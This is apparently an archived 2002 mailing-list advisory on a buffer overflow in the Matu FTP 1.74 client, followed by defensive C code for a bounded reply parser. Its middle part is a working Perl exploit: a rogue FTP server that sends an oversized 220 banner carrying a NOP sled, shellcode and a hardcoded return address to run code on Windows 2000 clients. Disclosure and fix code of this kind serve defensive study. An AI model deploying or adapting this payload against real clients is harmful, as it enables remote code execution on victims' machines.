Matu FTP remote buffer overflow vulnerability

/*--------------------------- Description ---------------------------*/

Matu FTP is a Japanese FTP client for the Win32 platform. We found an exploitable buffer overflow in Matu FTP version 1.74. The overflow occurs when a long reply line such as

220 AAAAAAAAAAAAAAAAA.....AAAAAAAAAAAAAAA<CR><LF>

is received by Matu FTP at the beginning of an FTP session. This vulnerability allows a malicious FTP server to execute arbitrary code on client hosts.

/*--------------------------- Vendor Status ---------------------------*/

Notified with no response

/*--------------------------- POC ---------------------------*/

This exploit code is invoked as an FTP server through inetd.

#!/usr/local/bin/perl
#------------------------------------------------------
# Matu Ftp Version 1.74 exploit for Windows2000 Professional (SP2)
# ( run under inetd )
# written by Kanatoko <anvilat_private>
# http://www.jumperz.net/
#------------------------------------------------------
$|=1;

#egg written by UNYUN (http://www.shadowpenguin.org/)
$egg  = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
$egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
$egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
$egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
$egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
$egg .= "notepad.exe";

#egg_address = 0x0012F43C
$buf  = "\x90" x 217;
$buf .= $egg;
$buf .= "A" x 2;
$buf .= "\x3C\xF4\x12\x00";
$buf .= "B" x 80;

print "220 $buf\r\n";

--
#sorry for the bad English
Kanatoko <anvilat_private>
http://www.jumperz.net/(Japanese)
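The defect the advisory describes is a client copying a server-controlled reply line into a fixed buffer without checking its length. As an added example that is not part of the advisory or of Matu FTP, the following C reader refuses oversized reply lines and bounds every copy; FTP_MAX_REPLY, ftp_parse_reply and check_banner are assumed names, and the 256-byte limit is an assumption, not Matu FTP's actual buffer size.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Added example, not Matu FTP's code: a bounded reader for one FTP
 * reply line. FTP_MAX_REPLY is an assumed hard limit; anything longer
 * is refused instead of being copied into a fixed-size buffer. */
#define FTP_MAX_REPLY 256

enum ftp_err { FTP_TOO_LONG = -1, FTP_MALFORMED = -2 };

/* Parse "NNN text\r\n" (or "NNN-text\r\n") from `in`. Copies at most
 * text_cap-1 bytes of the text part and always NUL-terminates it.
 * Returns the 3-digit reply code or a negative ftp_err value. */
int ftp_parse_reply(const char *in, size_t in_len, char *text, size_t text_cap)
{
    if (text_cap == 0) return FTP_MALFORMED;            /* nowhere to write */
    const char *eol = memchr(in, '\n', in_len);
    size_t line_len = eol ? (size_t)(eol - in) + 1 : in_len;
    if (line_len > FTP_MAX_REPLY) return FTP_TOO_LONG;  /* refuse, don't truncate */
    if (!eol) return FTP_MALFORMED;                      /* no line end within bound */
    size_t body = line_len - 1;
    if (body > 0 && in[body - 1] == '\r') body--;       /* drop CR of CRLF */
    if (body < 3 || !isdigit((unsigned char)in[0]) ||
        !isdigit((unsigned char)in[1]) || !isdigit((unsigned char)in[2]))
        return FTP_MALFORMED;
    if (body > 3 && in[3] != ' ' && in[3] != '-') return FTP_MALFORMED;
    int code = (in[0] - '0') * 100 + (in[1] - '0') * 10 + (in[2] - '0');
    size_t start = body > 3 ? 4 : 3;
    size_t text_len = body - start;
    if (text_len >= text_cap) text_len = text_cap - 1;  /* bounded copy */
    memcpy(text, in + start, text_len);
    text[text_len] = '\0';
    return code;
}

/* Build a constructed banner "220 " + fill x 'A' + CRLF, the shape the
 * advisory describes, and return the parser's verdict on it.
 * check_banner(7) -> 220; check_banner(360) -> FTP_TOO_LONG. */
int check_banner(size_t fill)
{
    char line[1024], text[64];
    if (fill > sizeof line - 6) return FTP_TOO_LONG;
    memcpy(line, "220 ", 4);
    memset(line + 4, 'A', fill);
    memcpy(line + 4 + fill, "\r\n", 2);
    return ftp_parse_reply(line, 6 + fill, text, sizeof text);
}
```

A 360-byte banner, the length of the advisory's payload, is rejected before any byte reaches the caller's buffer, while a normal greeting parses to code 220.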
This archive was generated by hypermail 2b30 : Mon Apr 22 2002 - 20:56:59 PDT